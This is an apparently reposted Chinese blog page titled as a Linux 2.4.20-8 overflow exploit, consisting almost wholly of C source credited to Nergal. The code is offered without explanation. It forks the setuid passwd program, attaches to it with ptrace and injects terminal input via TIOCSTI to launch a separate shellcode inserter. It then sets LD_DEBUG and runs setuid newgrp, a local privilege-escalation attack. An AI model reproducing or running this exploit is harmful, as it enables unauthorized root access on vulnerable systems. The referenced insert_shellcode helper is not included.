Linux l 2.4.20-8 # 溢出

最新推荐文章于 2021-04-06 19:49:14 发布

躲不过这哀伤

最新推荐文章于 2021-04-06 19:49:14 发布

阅读量46

点赞数

原文链接：http://www.cnblogs.com/baogg/archive/2011/05/02/2034170.html

版权

代码如下：

/* by Nergal */
#include <stdio.h>
#include <sys/ptrace.h>
#include <fcntl.h>
#include <sys/ioctl.h>
void ex_passwd(int fd)
{
char z;
if (read(fd, &z, 1) <= 0) {
perror("read:");
exit(1);
}
execl("/usr/bin/passwd", "passwd", 0);
perror("execl");
exit(1);
}
void insert(int pid)
{
char buf[100];
char *ptr = buf;
sprintf(buf, "exec ./insert_shellcode %i\n", pid);
while (*ptr && !ioctl(0, TIOCSTI, ptr++));
}

main(int argc, char **argv)
{
int res, fifo;
int status;
int pid, n;
int pipa[2];
char buf[1024];
pipe(pipa);
switch (pid = fork()) {
case -1:
  perror("fork");
  exit(1);
case 0:
  close(pipa[1]);
  ex_passwd(pipa[0]);
default:;
}

res = ptrace(PTRACE_ATTACH, pid, 0, 0);
if (res) {
  perror("attach");
  exit(1);
}
res = waitpid(-1, &status, 0);
if (res == -1) {
  perror("waitpid");
  exit(1);
}
res = ptrace(PTRACE_CONT, pid, 0, 0);
if (res) {
  perror("cont");
  exit(1);
}
fprintf(stderr, "attached\n");
switch (fork()) {
case -1:
  perror("fork");
  exit(1);
case 0:
  close(pipa[1]);
  sleep(1);
  insert(pid);
  do {
   n = read(pipa[0], buf, sizeof(buf));
  } while (n > 0);
  if (n < 0)
   perror("read");
  exit(0);
default:;
}
close(pipa[0]);

dup2(pipa[1], 2);
close(pipa[1]);
/* Decrystallizing reason */
setenv("LD_DEBUG", "libs", 1);
/* With strength I burn */
execl("/usr/bin/newgrp", "newgrp", 0);

转载于:https://www.cnblogs.com/baogg/archive/2011/05/02/2034170.html

躲不过这哀伤

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Linux l 2.4.20-8 # 溢出

代码如下：/* by Nergal */#include <stdio.h>#include <sys/ptrace.h>#include <fcntl.h>#include <sys/ioctl.h>void ex_passwd(int fd){char z;if (read(fd, &z, 1) <= 0) {...
复制链接

扫一扫